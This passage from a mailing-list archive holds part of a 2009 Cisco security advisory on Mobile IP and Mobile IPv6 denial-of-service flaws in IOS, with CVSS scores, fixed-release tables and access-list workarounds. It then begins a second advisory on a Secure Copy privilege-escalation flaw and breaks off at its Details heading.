and configured for Mobile IP NAT Traversal feature or Mobile IPv6 are
vulnerable.
Vulnerable Products
+------------------
Devices running Cisco IOS Software and configured for Mobile IP NAT
Traversal feature will have a line similar to the following in the
output of the show running-config command:
ip mobile home-agent nat traversal [...]
or
ip mobile foreign-agent nat traversal [...]
or
ip mobile router-service collocated registration nat traversal [...]
Devices running Cisco IOS Software and configured for Mobile IPv6
will have a line similar to the following in the output of the show
running-config command:
ipv6 mobile home-agent
To determine the Cisco IOS Software release that is running on a
Cisco product, administrators can log in to the device and issue the
show version command to display the system banner. The system banner
confirms that the device is running Cisco IOS Software by displaying
text similar to "Cisco Internetwork Operating System Software" or
"Cisco IOS Software." The image name displays in parentheses,
followed by "Version" and the Cisco IOS Software release name. Other
Cisco devices do not have the show version command or may provide
different output.
The following example identifies a Cisco product that is running
Cisco IOS Software Release 12.3(26) with an installed image name of
C2500-IS-L:
Router#show version
Cisco Internetwork Operating System Software
IOS (tm) 2500 Software (C2500-IS-L), Version 12.3(26), RELEASE SOFTWARE (fc2)
Technical Support:
http://www.cisco.com/techsupport
Copyright (c) 1986-2008 by cisco Systems, Inc.
Compiled Mon 17-Mar-08 14:39 by dchih
!--- output truncated
The following example identifies a Cisco product that is running
Cisco IOS Software Release 12.4(20)T with an installed image name of
C1841-ADVENTERPRISEK9-M:
Router#show version
Cisco IOS Software, 1841 Software (C1841-ADVENTERPRISEK9-M), Version 12.4(20)T, RELEASE SOFTWARE (fc3)
Technical Support:
http://www.cisco.com/techsupport
Copyright (c) 1986-2008 by Cisco Systems, Inc.
Compiled Thu 10-Jul-08 20:25 by prod_rel_team
!--- output truncated
Additional information about Cisco IOS Software release naming
conventions is available in "White Paper: Cisco IOS Reference Guide"
at the following link:
http://www.cisco.com/warp/public/620/1.html
Products Confirmed Not Vulnerable
+--------------------------------
Cisco IOS XR is not affected by these vulnerabilities.
Cisco IOS XE is not affected by these vulnerabilities.
No other Cisco products are currently known to be affected by these
vulnerabilities.
Details
======
Mobile IP is part of both IPv4 and IPv6 standards. Mobile IP allows a
host device to be identified by a single IP address even though the
device may move its physical point of attachment from one network to
another. Regardless of movement between different networks,
connectivity at the different points is achieved seamlessly without
user intervention. Roaming from a wired network to a wireless or
wide-area network is also possible.
More information on Mobile IPv6 can be found at the following link:
http://www.cisco.com/en/US/docs/ios/ipv6/configuration/guide/ip6-mobile.html
The Mobile IP Support NAT Traversal feature is documented in RFC
3519. It introduces an alternative method for tunneling Mobile IP
data traffic. New extensions in the Mobile IP registration request
and reply messages have been added for establishing User Datagram
Protocol (UDP) tunneling. This feature allows mobile devices in
collocated mode that use a private IP address (RFC 1918) or foreign
agents (FAs) that use a private IP address for the care-of address
(CoA) to establish a tunnel and traverse a NAT-enabled router with
mobile node (MN) data traffic from the home agent (HA).
More information on Mobile IP NAT Traversal feature can be found at
the following link:
http://www.cisco.com/en/US/docs/ios/12_3t/12_3t8/feature/guide/gtnatmip.html
Devices that are running an affected version of Cisco IOS Software
and configured for Mobile IPv6 or Mobile IP NAT Traversal feature are
affected by a DoS vulnerability. A successful exploitation of this
vulnerability could cause an interface to stop processing traffic
until the system is restarted. Offending packets need to be destined
to the router for a successful exploit.
These vulnerabilities are documented in the Cisco Bug IDs CSCsm97220
and CSCso05337 and have been assigned Common Vulnerabilities and
Exposures (CVE) IDs CVE-2009-0633 and CVE-2009-0634.
Vulnerability Scoring Details
============================
Cisco has provided scores for the vulnerabilities in this advisory
based on the Common Vulnerability Scoring System (CVSS). The CVSS
scoring in this Security Advisory is done in accordance with CVSS
version 2.0.
CVSS is a standards-based scoring method that conveys vulnerability
severity and helps determine urgency and priority of response.
Cisco has provided a base and temporal score. Customers can then
compute environmental scores to assist in determining the impact of
the vulnerability in individual networks.
Cisco has provided an FAQ to answer additional questions regarding
CVSS at
http://www.cisco.com/web/about/security/intelligence/cvss-qandas.html
Cisco has also provided a CVSS calculator to help compute the
environmental impact for individual networks at
http://intellishield.cisco.com/security/alertmanager/cvss
CSCsm97220 - Input queue wedged by MIPv6 packets
CVSS Base Score - 7.8
Access Vector - Network
Access Complexity - Low
Authentication - None
Confidentiality Impact - None
Integrity Impact - None
Availability Impact - Complete
CVSS Temporal Score - 6.4
Exploitability - Functional
Remediation Level - Official-Fix
Report Confidence - Confirmed
CSCso05337 - HA: Input queue wedged by ICMP packet
CVSS Base Score - 7.1
Access Vector - Network
Access Complexity - Medium
Authentication - None
Confidentiality Impact - None
Integrity Impact - None
Availability Impact - Complete
CVSS Temporal Score - 5.9
Exploitability - Functional
Remediation Level - Official-Fix
Report Confidence - Confirmed
Impact
=====
Successful exploitation of the vulnerability may result in an
interface to stop processing traffic, causing a DoS condition.
Software Versions and Fixes
==========================
When considering software upgrades, also consult
http://www.cisco.com/go/psirt and any subsequent advisories to
determine exposure and a complete upgrade solution.
In all cases, customers should exercise caution to be certain the
devices to be upgraded contain sufficient memory and that current
hardware and software configurations will continue to be supported
properly by the new release. If the information is not clear, contact
the Cisco Technical Assistance Center (TAC) or your contracted
maintenance provider for assistance.
Each row of the Cisco IOS software table (below) names a Cisco IOS
release train. If a given release train is vulnerable, then the
earliest possible releases that contain the fix (along with the
anticipated date of availability for each, if applicable) are listed
in the "First Fixed Release" column of the table. The "Recommended
Release" column indicates the releases which have fixes for all the
published vulnerabilities at the time of this Advisory. A device
running a release in the given train that is earlier than the release
in a specific column (less than the First Fixed Release) is known to
be vulnerable. Cisco recommends upgrading to a release equal to or
later than the release in the "Recommended Releases" column of the
table.
+-------------------------------------------------------------------+
| Major | Availability of Repaired Releases |
| Release | |
|------------+------------------------------------------------------|
| Affected | | Recommended |
| 12.0-Based | First Fixed Release | Release |
| Releases | | |
|-------------------------------------------------------------------|
| There are no affected 12.0 based releases |
|-------------------------------------------------------------------|
| Affected | | Recommended |
| 12.1-Based | First Fixed Release | Release |
| Releases | | |
|-------------------------------------------------------------------|
| There are no affected 12.1 based releases |
|-------------------------------------------------------------------|
| Affected | | Recommended |
| 12.2-Based | First Fixed Release | Release |
| Releases | | |
|-------------------------------------------------------------------|
| There are no affected 12.2 based releases |
|-------------------------------------------------------------------|
| Affected | | Recommended |
| 12.3-Based | First Fixed Release | Release |
| Releases | | |
|------------+--------------------------------------+---------------|
| 12.3 | Not Vulnerable | |
|------------+--------------------------------------+---------------|
| 12.3B | Not Vulnerable | |
|------------+--------------------------------------+---------------|
| 12.3BC | Not Vulnerable | |
|------------+--------------------------------------+---------------|
| 12.3BW | Not Vulnerable | |
|------------+--------------------------------------+---------------|
| 12.3EU | Not Vulnerable | |
|------------+--------------------------------------+---------------|
| 12.3JA | Not Vulnerable | |
|------------+--------------------------------------+---------------|
| 12.3JEA | Not Vulnerable | |
|------------+--------------------------------------+---------------|
| 12.3JEB | Not Vulnerable | |
|------------+--------------------------------------+---------------|
| 12.3JEC | Not Vulnerable | |
|------------+--------------------------------------+---------------|
| 12.3JK | Not Vulnerable | |
|------------+--------------------------------------+---------------|
| 12.3JL | Not Vulnerable | |
|------------+--------------------------------------+---------------|
| 12.3JX | Not Vulnerable | |
|------------+--------------------------------------+---------------|
| | | 12.4(22)T1 |
| | | |
| 12.3T | Vulnerable; first fixed in 12.4T | 12.4(15)T9; |
| | | Available on |
| | | 29-APR-2009 |
|------------+--------------------------------------+---------------|
| 12.3TPC | Not Vulnerable | |
|------------+--------------------------------------+---------------|
| 12.3VA | Not Vulnerable | |
|------------+--------------------------------------+---------------|
| 12.3XA | Not Vulnerable | |
|------------+--------------------------------------+---------------|
| 12.3XB | Not Vulnerable | |
|------------+--------------------------------------+---------------|
| 12.3XC | Not Vulnerable | |
|------------+--------------------------------------+---------------|
| 12.3XD | Not Vulnerable | |
|------------+--------------------------------------+---------------|
| 12.3XE | Not Vulnerable | |
|------------+--------------------------------------+---------------|
| 12.3XF | Not Vulnerable | |
|------------+--------------------------------------+---------------|
| 12.3XG | Not Vulnerable | |
|------------+--------------------------------------+---------------|
| 12.3XI | Not Vulnerable | |
|------------+--------------------------------------+---------------|
| 12.3XJ | Not Vulnerable | |
|------------+--------------------------------------+---------------|
| 12.3XK | Not Vulnerable | |
|------------+--------------------------------------+---------------|
| 12.3XL | Not Vulnerable | |
|------------+--------------------------------------+---------------|
| 12.3XQ | Not Vulnerable | |
|------------+--------------------------------------+---------------|
| 12.3XR | Not Vulnerable | |
|------------+--------------------------------------+---------------|
| 12.3XS | Not Vulnerable | |
|------------+--------------------------------------+---------------|
| 12.3XU | Not Vulnerable | |
|------------+--------------------------------------+---------------|
| 12.3XW | Not Vulnerable | |
|------------+--------------------------------------+---------------|
| 12.3XX | Not Vulnerable | |
|------------+--------------------------------------+---------------|
| 12.3XY | Not Vulnerable | |
|------------+--------------------------------------+---------------|
| 12.3XZ | Not Vulnerable | |
|------------+--------------------------------------+---------------|
| 12.3YA | Not Vulnerable | |
|------------+--------------------------------------+---------------|
| 12.3YD | Not Vulnerable | |
|------------+--------------------------------------+---------------|
| 12.3YF | Not Vulnerable | |
|------------+--------------------------------------+---------------|
| 12.3YG | Not Vulnerable | |
|------------+--------------------------------------+---------------|
| 12.3YH | Not Vulnerable | |
|------------+--------------------------------------+---------------|
| 12.3YI | Not Vulnerable | |
|------------+--------------------------------------+---------------|
| 12.3YJ | Not Vulnerable | |
|------------+--------------------------------------+---------------|
| | Releases prior to 12.3(11)YK3 are | 12.4(22)T1 |
| | vulnerable, release 12.3(11)YK3 and | |
| 12.3YK | later are not vulnerable; first | 12.4(15)T9; |
| | fixed in 12.4T | Available on |
| | | 29-APR-2009 |
|------------+--------------------------------------+---------------|
| 12.3YM | 12.3(14)YM13 | 12.3(14)YM13 |
|------------+--------------------------------------+---------------|
| | | 12.4(22)T1 |
| | | |
| 12.3YQ | Vulnerable; first fixed in 12.4T | 12.4(15)T9; |
| | | Available on |
| | | 29-APR-2009 |
|------------+--------------------------------------+---------------|
| | | 12.4(22)T1 |
| | | |
| 12.3YS | Vulnerable; first fixed in 12.4T | 12.4(15)T9; |
| | | Available on |
| | | 29-APR-2009 |
|------------+--------------------------------------+---------------|
| | | 12.4(22)T1 |
| | | |
| 12.3YT | Vulnerable; first fixed in 12.4T | 12.4(15)T9; |
| | | Available on |
| | | 29-APR-2009 |
|------------+--------------------------------------+---------------|
| | | 12.4(22)T1 |
| | | |
| 12.3YU | Vulnerable; migrate to 12.4T | 12.4(15)T9; |
| | | Available on |
| | | 29-APR-2009 |
|------------+--------------------------------------+---------------|
| | Releases prior to 12.3(14)YX10 are | |
| 12.3YX | vulnerable, release 12.3(14)YX10 and | 12.3(14)YX14 |
| | later are not vulnerable; | |
|------------+--------------------------------------+---------------|
| 12.3YZ | Not Vulnerable | |
|------------+--------------------------------------+---------------|
| 12.3ZA | Not Vulnerable | |
|------------+--------------------------------------+---------------|
| Affected | | Recommended |
| 12.4-Based | First Fixed Release | Release |
| Releases | | |
|------------+--------------------------------------+---------------|
| | | 12.4(18e) |
| | 12.4(18e) | |
| 12.4 | | 12.4(23a); |
| | 12.4(23a); Available on 30-APR-2009 | Available on |
| | | 30-APR-2009 |
|------------+--------------------------------------+---------------|
| 12.4JA | Not Vulnerable | |
|------------+--------------------------------------+---------------|
| 12.4JDA | Not Vulnerable | |
|------------+--------------------------------------+---------------|
| 12.4JK | Not Vulnerable | |
|------------+--------------------------------------+---------------|
| 12.4JL | Not Vulnerable | |
|------------+--------------------------------------+---------------|
| 12.4JMA | Not Vulnerable | |
|------------+--------------------------------------+---------------|
| 12.4JMB | Not Vulnerable | |
|------------+--------------------------------------+---------------|
| 12.4JX | Not Vulnerable | |
|------------+--------------------------------------+---------------|
| 12.4MD | Not Vulnerable | |
|------------+--------------------------------------+---------------|
| 12.4MR | 12.4(19)MR | 12.4(19)MR2 |
|------------+--------------------------------------+---------------|
| 12.4SW | Not Vulnerable | |
|------------+--------------------------------------+---------------|
| | 12.4(20)T | 12.4(22)T1 |
| | | |
| 12.4T | 12.4(15)T8 | 12.4(15)T9; |
| | | Available on |
| | 12.4(15)T9; Available on 29-APR-2009 | 29-APR-2009 |
|------------+--------------------------------------+---------------|
| | | 12.4(22)T1 |
| | | |
| 12.4XA | Vulnerable; first fixed in 12.4T | 12.4(15)T9; |
| | | Available on |
| | | 29-APR-2009 |
|------------+--------------------------------------+---------------|
| | 12.4(15)T8 | 12.4(22)T1 |
| | | |
| 12.4XB | 12.4(20)T | 12.4(15)T9; |
| | | Available on |
| | 12.4(15)T9; Available on 29-APR-2009 | 29-APR-2009 |
|------------+--------------------------------------+---------------|
| | | 12.4(22)T1 |
| | | |
| 12.4XC | Vulnerable; first fixed in 12.4T | 12.4(15)T9; |
| | | Available on |
| | | 29-APR-2009 |
|------------+--------------------------------------+---------------|
| | 12.4(4)XD12; Available on | 12.4(4)XD12; |
| 12.4XD | 27-MAR-2009 | Available on |
| | | 27-MAR-2009 |
|------------+--------------------------------------+---------------|
| | | 12.4(22)T1 |
| | | |
| 12.4XE | Vulnerable; first fixed in 12.4T | 12.4(15)T9; |
| | | Available on |
| | | 29-APR-2009 |
|------------+--------------------------------------+---------------|
| | | 12.4(22)T1 |
| | | |
| 12.4XF | Vulnerable; first fixed in 12.4T | 12.4(15)T9; |
| | | Available on |
| | | 29-APR-2009 |
|------------+--------------------------------------+---------------|
| 12.4XG | Not Vulnerable | |
|------------+--------------------------------------+---------------|
| | | 12.4(22)T1 |
| | | |
| 12.4XJ | Vulnerable; first fixed in 12.4T | 12.4(15)T9; |
| | | Available on |
| | | 29-APR-2009 |
|------------+--------------------------------------+---------------|
| 12.4XK | Not Vulnerable | |
|------------+--------------------------------------+---------------|
| 12.4XL | 12.4(15)XL4 | 12.4(15)XL4 |
|------------+--------------------------------------+---------------|
| | | 12.4(22)T1 |
| | | |
| 12.4XM | Vulnerable; first fixed in 12.4T | 12.4(15)T9; |
| | | Available on |
| | | 29-APR-2009 |
|------------+--------------------------------------+---------------|
| 12.4XN | Vulnerable; contact TAC | |
|------------+--------------------------------------+---------------|
| 12.4XP | Vulnerable; contact TAC | |
|------------+--------------------------------------+---------------|
| 12.4XQ | 12.4(15)XQ2 | 12.4(15)XQ2 |
|------------+--------------------------------------+---------------|
| 12.4XR | 12.4(15)XR4 | 12.4(22)T1 |
|------------+--------------------------------------+---------------|
| | | 12.4(22)T1 |
| | | |
| 12.4XT | Vulnerable; first fixed in 12.4T | 12.4(15)T9; |
| | | Available on |
| | | 29-APR-2009 |
|------------+--------------------------------------+---------------|
| 12.4XV | Vulnerable; contact TAC | |
|------------+--------------------------------------+---------------|
| 12.4XW | 12.4(11)XW10 | 12.4(11)XW10 |
|------------+--------------------------------------+---------------|
| | | 12.4(22)T1 |
| | | |
| 12.4XY | 12.4(15)XY4 | 12.4(15)T9; |
| | | Available on |
| | | 29-APR-2009 |
|------------+--------------------------------------+---------------|
| 12.4XZ | 12.4(15)XZ1 | 12.4(15)XZ2 |
|------------+--------------------------------------+---------------|
| 12.4YA | Not Vulnerable | |
|------------+--------------------------------------+---------------|
| 12.4YB | Not Vulnerable | |
|------------+--------------------------------------+---------------|
| 12.4YD | Not Vulnerable | |
+-------------------------------------------------------------------+
Workarounds
==========
The following mitigation and identification methods have been
identified for these vulnerabilities:
Infrastructure Access Control Lists
+----------------------------------
Although it is often difficult to block traffic that transits a
network, it is possible to identify traffic that should never be
allowed to target infrastructure devices and block that traffic at
the border of networks. Infrastructure Access Control Lists (iACLs)
are a network security best practice and should be considered as a
long-term addition to good network security as well as a workaround
for these specific vulnerabilities. The iACL example below should be
included as part of the deployed infrastructure access-list which
will protect all devices with IP addresses in the infrastructure IP
address range:
IPv4 example:
!--- Anti-spoofing entries are shown here.
!--- Deny special-use address sources.
!--- Refer to RFC 3330 for additional special use addresses.
access-list 110 deny ip host 0.0.0.0 any
access-list 110 deny ip 127.0.0.0 0.255.255.255 any
access-list 110 deny ip 192.0.2.0 0.0.0.255 any
access-list 110 deny ip 224.0.0.0 31.255.255.255 any
!--- Filter RFC 1918 space.
access-list 110 deny ip 10.0.0.0 0.255.255.255 any
access-list 110 deny ip 172.16.0.0 0.15.255.255 any
access-list 110 deny ip 192.168.0.0 0.0.255.255 any
!--- Deny your space as source from entering your AS.
!--- Deploy only at the AS edge.
access-list 110 deny ip YOUR_CIDR_BLOCK any
!--- Permit BGP.
access-list 110 permit tcp host bgp_peer host router_ip eq bgp
access-list 110 permit tcp host bgp_peer eq bgp host router_ip
!--- Deny access to internal infrastructure addresses.
access-list 110 deny ip any INTERNAL_INFRASTRUCTURE_ADDRESSES
!--- Permit transit traffic.
access-list 110 permit ip any any
IPv6 example:
!--- Configure the access-list.
ipv6 access-list iacl
!--- Deny your space as source from entering your AS.
!--- Deploy only at the AS edge.
deny ipv6 YOUR_CIDR_BLOCK_IPV6 any
!--- Permit multiprotocol BGP.
permit tcp host bgp_peer_ipv6 host router_ipv6 eq bgp
permit tcp host bgp_peer_ipv6 eq bgp host router_ipv6
!--- Deny access to internal infrastructure addresses.
deny ipv6 any INTERNAL_INFRASTRUCTURE_ADDRESSES_IPV6
!--- Permit transit traffic.
permit ipv6 any any
The white paper entitled "Protecting Your Core: Infrastructure
Protection Access Control Lists" presents guidelines and recommended
deployment techniques for infrastructure protection access lists.
This white paper can be obtained at the following link
http://www.cisco.com/en/US/tech/tk648/tk361/technologies_white_paper09186a00801a1a55.shtml
Cisco IOS Embedded Event Manager
+-------------------------------
It is possible to detect blocked interface queues with a Cisco IOS
Embedded Event Manager (EEM) policy. EEM provides event detection and
reaction capabilities on a Cisco IOS device. EEM can alert
administrators of blocked interfaces with email, a syslog message, or
a Simple Network Management Protocol (SNMP) trap.
A sample EEM policy that uses syslog to alert administrators of
blocked interfaces is available at Cisco Beyond, an online community
dedicated to EEM. A sample script is available at the following link:
http://forums.cisco.com/eforum/servlet/EEM?page�m&fn=script&scriptId�1
More information about EEM is available from Cisco.com at the
following link:
http://www.cisco.com/en/US/products/ps6815/products_ios_protocol_group_home.html
Obtaining Fixed Software
=======================
Cisco has released free software updates that address these
vulnerabilities. Prior to deploying software, customers should
consult their maintenance provider or check the software for feature
set compatibility and known issues specific to their environment.
Customers may only install and expect support for the feature sets
they have purchased. By installing, downloading, accessing or
otherwise using such software upgrades, customers agree to be bound
by the terms of Cisco's software license terms found at
http://www.cisco.com/en/US/docs/general/warranty/English/EU1KEN_.html,
or as otherwise set forth at Cisco.com Downloads at
http://www.cisco.com/public/sw-center/sw-usingswc.shtml
Do not contact psirt@cisco.com or security-alert@cisco.com for
software upgrades.
Customers with Service Contracts
+-------------------------------
Customers with contracts should obtain upgraded software through
their regular update channels. For most customers, this means that
upgrades should be obtained through the Software Center on Cisco's
worldwide website at
http://www.cisco.com
Customers using Third Party Support Organizations
+------------------------------------------------
Customers whose Cisco products are provided or maintained through
prior or existing agreements with third-party support organizations,
such as Cisco Partners, authorized resellers, or service providers
should contact that support organization for guidance and assistance
with the appropriate course of action in regards to this advisory.
The effectiveness of any workaround or fix is dependent on specific
customer situations, such as product mix, network topology, traffic
behavior, and organizational mission. Due to the variety of affected
products and releases, customers should consult with their service
provider or support organization to ensure any applied workaround or
fix is the most appropriate for use in the intended network before it
is deployed.
Customers without Service Contracts
+----------------------------------
Customers who purchase direct from Cisco but do not hold a Cisco
service contract, and customers who purchase through third-party
vendors but are unsuccessful in obtaining fixed software through
their point of sale should acquire upgrades by contacting the Cisco
Technical Assistance Center (TAC). TAC contacts are as follows.
* +1 800 553 2447 (toll free from within North America)
* +1 408 526 7209 (toll call from anywhere in the world)
* e-mail: tac@cisco.com
Customers should have their product serial number available and be
prepared to give the URL of this notice as evidence of entitlement to
a free upgrade. Free upgrades for non-contract customers must be
requested through the TAC.
Refer to
http://www.cisco.com/en/US/support/tsd_cisco_worldwide_contacts.html
for additional TAC contact information, including localized telephone
numbers, and instructions and e-mail addresses for use in various
languages.
Exploitation and Public Announcements
====================================
The Cisco PSIRT is not aware of any public announcements or malicious
use of the vulnerability described in this advisory.
This vulnerability was reported to Cisco by a customer.
Status of this Notice: FINAL
===========================
THIS DOCUMENT IS PROVIDED ON AN "AS IS" BASIS AND DOES NOT IMPLY ANY
KIND OF GUARANTEE OR WARRANTY, INCLUDING THE WARRANTIES OF
MERCHANTABILITY OR FITNESS FOR A PARTICULAR USE. YOUR USE OF THE
INFORMATION ON THE DOCUMENT OR MATERIALS LINKED FROM THE DOCUMENT IS
AT YOUR OWN RISK. CISCO RESERVES THE RIGHT TO CHANGE OR UPDATE THIS
DOCUMENT AT ANY TIME.
A stand-alone copy or Paraphrase of the text of this document that
omits the distribution URL in the following section is an
uncontrolled copy, and may lack important information or contain
factual errors.
Distribution
===========
This advisory is posted on Cisco's worldwide website at :
http://www.cisco.com/warp/public/707/cisco-sa-20090325-mobileip.shtml
In addition to worldwide web posting, a text version of this notice
is clear-signed with the Cisco PSIRT PGP key and is posted to the
following e-mail and Usenet news recipients.
* cust-security-announce@cisco.com
* first-bulletins@lists.first.org
* bugtraq@securityfocus.com
* vulnwatch@vulnwatch.org
* cisco@spot.colorado.edu
* cisco-nsp@puck.nether.net
* full-disclosure@lists.grok.org.uk
* comp.dcom.sys.cisco@newsgate.cisco.com
Future updates of this advisory, if any, will be placed on Cisco's
worldwide website, but may or may not be actively announced on
mailing lists or newsgroups. Users concerned about this problem are
encouraged to check the above URL for any updates.
Revision History
===============
+---------------------------------------+
| Revision | | Initial |
| 1.0 | 2009-Mar-25 | public |
| | | release |
+---------------------------------------+
Cisco Security Procedures
========================
Complete information on reporting security vulnerabilities in Cisco
products, obtaining assistance with security incidents, and
registering to receive security information from Cisco, is available
on Cisco's worldwide website at
http://www.cisco.com/en/US/products/products_security_vulnerability_policy.html
This includes instructions for press inquiries regarding Cisco
security notices. All Cisco security advisories are available at
http://www.cisco.com/go/psirt
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.8 (Darwin)
iEYEARECAAYFAknKUa8ACgkQ86n/Gc8U/uBD0ACfYblb5Nscx1zIWMLeihiaZAe7
TtsAoIGgf8/ubiolVwSDmu/tCTgH8skm
=YxAj
-----END PGP SIGNATURE-----
From - Wed Mar 25 15:02:49 2009
X-Account-Key: account7
X-UIDL: 4909bb8c00006cac
X-Mozilla-Status: 0001
X-Mozilla-Status2: 00000000
Return-Path: <bugtraq-return-39837-lists=securityspace.com@securityfocus.com>
X-Original-To: lists@securityspace.com
Delivered-To: lists@securityspace.com
Received: from outgoing3.securityfocus.com (outgoing.securityfocus.com [205.206.231.27])
by mx.securityspace.com (Postfix) with ESMTP id 9AE9BEC183
for <lists@securityspace.com>; Wed, 25 Mar 2009 15:01:46 -0400 (EDT)
Received: from lists2.securityfocus.com (lists2.securityfocus.com [205.206.231.20])
by outgoing3.securityfocus.com (Postfix) with QMQP
id C06502372B6; Wed, 25 Mar 2009 09:33:49 -0700 (MST)
Mailing-List: contact bugtraq-help@securityfocus.com; run by ezmlm
Precedence: bulk
List-Id: <bugtraq.list-id.securityfocus.com>
List-Post: <mailto:bugtraq@securityfocus.com>
List-Help: <mailto:bugtraq-help@securityfocus.com>
List-Unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
List-Subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
Delivered-To: mailing list bugtraq@securityfocus.com
Delivered-To: moderator for bugtraq@securityfocus.com
Received: (qmail 609 invoked from network); 25 Mar 2009 16:09:14 -0000
X-TACSUNS: Virus Scanned
Sender: nobody@cisco.com
From: Cisco Systems Product Security Incident Response Team <psirt@cisco.com>
To: bugtraq@securityfocus.com
Cc: psirt@cisco.com
Subject: Cisco Security Advisory: Cisco IOS Software Secure Copy Privilege Escalation Vulnerability
Date: Wed, 25 Mar 2009 17:00:00 +0100
Message-id: <200903251705.scp@psirt.cisco.com>
Reply-To: psirt@cisco.com
Errors-To: nobody@cisco.com
MIME-Version: 1.0
Content-Type: Text/Plain; charset="us-ascii"
Content-Transfer-Encoding: 8bit
Prevent-NonDelivery-Report:
Content-Return: Prohibited
Status:
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
Cisco Security Advisory: Cisco IOS Software Secure Copy Privilege
Escalation Vulnerability
Advisory ID: cisco-sa-20090325-scp
http://www.cisco.com/warp/public/707/cisco-sa-20090325-scp.shtml
Revision 1.0
For Public Release 2009 March 25 1600 UTC (GMT)
- ---------------------------------------------------------------------
Summary
======
The server side of the Secure Copy (SCP) implementation in Cisco IOS
software contains a vulnerability that could allow authenticated
users with an attached command-line interface (CLI) view to transfer
files to and from a Cisco IOS device that is configured to be an SCP
server, regardless of what users are authorized to do, per the CLI
view configuration. This vulnerability could allow valid users to
retrieve or write to any file on the device's file system, including
the device's saved configuration and Cisco IOS image files, even if
the CLI view attached to the user does not allow it. This
configuration file may include passwords or other sensitive
information.
The Cisco IOS SCP server is an optional service that is disabled by
default. CLI views are a fundamental component of the Cisco IOS
Role-Based CLI Access feature, which is also disabled by default.
Devices that are not specifically configured to enable the Cisco IOS
SCP server, or that are configured to use it but do not use
role-based CLI access, are not affected by this vulnerability.
This vulnerability does not apply to the Cisco IOS SCP client
feature.
Cisco has released free software updates that address this
vulnerability.
There are no workarounds available for this vulnerability apart from
disabling either the SCP server or the CLI view feature if these
services are not required by administrators.
This advisory is posted at the following link:
http://www.cisco.com/warp/public/707/cisco-sa-20090325-scp.shtml
Note: The March 25, 2009, Cisco IOS Security Advisory bundled
publication includes eight Security Advisories. All of the advisories
address vulnerabilities in Cisco IOS Software. Each advisory lists
the releases that correct the vulnerability or vulnerabilities in the
advisory. The following table lists releases that correct all Cisco
IOS Software vulnerabilities that have been published in Cisco
Security Advisories on March 25, 2009, or earlier.
http://www.cisco.com/warp/public/707/cisco-sa-20090325-bundle.shtml
Individual publication links are listed below:
* Cisco IOS cTCP Denial of Service Vulnerability
http://www.cisco.com/warp/public/707/cisco-sa-20090325-ctcp.shtml
* Cisco IOS Software Multiple Features IP Sockets Vulnerability
http://www.cisco.com/warp/public/707/cisco-sa-20090325-ip.shtml
* Cisco IOS Software Mobile IP and Mobile IPv6 Vulnerabilities
http://www.cisco.com/warp/public/707/cisco-sa-20090325-mobileip.shtml
* Cisco IOS Software Secure Copy Privilege Escalation Vulnerability
http://www.cisco.com/warp/public/707/cisco-sa-20090325-scp.shtml
* Cisco IOS Software Session Initiation Protocol Denial of Service
Vulnerability
http://www.cisco.com/warp/public/707/cisco-sa-20090325-sip.shtml
* Cisco IOS Software Multiple Features Crafted TCP Sequence
Vulnerability
http://www.cisco.com/warp/public/707/cisco-sa-20090325-tcp.shtml
* Cisco IOS Software Multiple Features Crafted UDP Packet
Vulnerability
http://www.cisco.com/warp/public/707/cisco-sa-20090325-udp.shtml
* Cisco IOS Software WebVPN and SSLVPN Vulnerabilities
http://www.cisco.com/warp/public/707/cisco-sa-20090325-webvpn.shtml
Affected Products
================
Vulnerable Products
+------------------
Cisco devices running an affected Cisco IOS software release,
configured to offer SCP server functionality, and configured to use
role-based ACL access are affected by this issue.
A device running a vulnerable Cisco IOS software release is affected
if its configuration is similar to the following:
parser view <view name>
<Definition of the CLI view>
!
username <user ID> view <view name> secret <some secret>
!
ip scp server enable
In the above configuration snippet, the parser view command defines a
view that specifies what commands users in that view can execute. The
username command defines a local user and attaches, via the view
keyword, the previously defined view to the user. And finally, the ip
scp server enable command enables the Cisco IOS SCP server.
The absence of the username command does not guarantee that the
device's configuration is not affected by this vulnerability because
the name of a CLI view can be supplied by means of an Authentication,
Authorization, and Accounting (AAA) server by using the cli-view-name
attribute.
Note: The CLI view attached to a user can be supplied by a AAA
server. When inspecting a device's configuration to determine if it
is affected by this vulnerability it is better to check if the SCP
service is enabled (ip scp server enabled command) and whether there
are any CLI views defined (parser view command).
The Cisco IOS SCP server and role-based CLI access features are
disabled by default.
The SCP server functionality is only available on encryption-capable
images. Encryption-capable images are those that contain either a
"k8" or "k9" in the image name, for example, "C7200-ADVSECURITYK9-M".
Devices that do not run encryption-capable images are not vulnerable.
If a device is running an encryption-capable image, the presence in
the configuration of the ip scp server enable command, the existence
of CLI views (parser view command), and whether there are users
(local or remote) attached to these views will determine if the
device is affected.
To determine the Cisco IOS Software release that is running on a
Cisco product, administrators can log in to the device and issue the
show version command to display the system banner. The system banner
confirms that the device is running Cisco IOS Software by displaying
text similar to "Cisco Internetwork Operating System Software" or
"Cisco IOS Software." The image name displays in parentheses,
followed by "Version" and the Cisco IOS Software release name. Other
Cisco devices do not have the show version command or may provide
different output.
The following example identifies a Cisco product that is running
Cisco IOS Software Release 12.3(26) with an installed image name of
C2500-IS-L:
Router#show version
Cisco Internetwork Operating System Software
IOS (tm) 2500 Software (C2500-IS-L), Version 12.3(26), RELEASE SOFTWARE (fc2)
Technical Support:
http://www.cisco.com/techsupport
Copyright (c) 1986-2008 by cisco Systems, Inc.
Compiled Mon 17-Mar-08 14:39 by dchih
!--- output truncated
The following example identifies a Cisco product that is running
Cisco IOS Software Release 12.4(20)T with an installed image name of
C1841-ADVENTERPRISEK9-M:
Router#show version
Cisco IOS Software, 1841 Software (C1841-ADVENTERPRISEK9-M), Version 12.4(20)T, RELEASE SOFTWARE (fc3)
Technical Support:
http://www.cisco.com/techsupport
Copyright (c) 1986-2008 by Cisco Systems, Inc.
Compiled Thu 10-Jul-08 20:25 by prod_rel_team
!--- output truncated
Additional information about Cisco IOS Software release naming
conventions is available in "White Paper: Cisco IOS Reference Guide"
at the following link:
http://www.cisco.com/warp/public/620/1.html
Cisco IOS XE Software is also affected by this vulnerability.
Products Confirmed Not Vulnerable
+--------------------------------
Cisco devices that do not run Cisco IOS software are not affected.
Cisco IOS devices that do not have the SCP server feature enabled, or
that make use of the feature but do not have the role-based CLI
feature enabled, are not affected.
Cisco IOS XR Software is not affected.
No other Cisco products are currently known to be affected by this
vulnerability.
Details
======
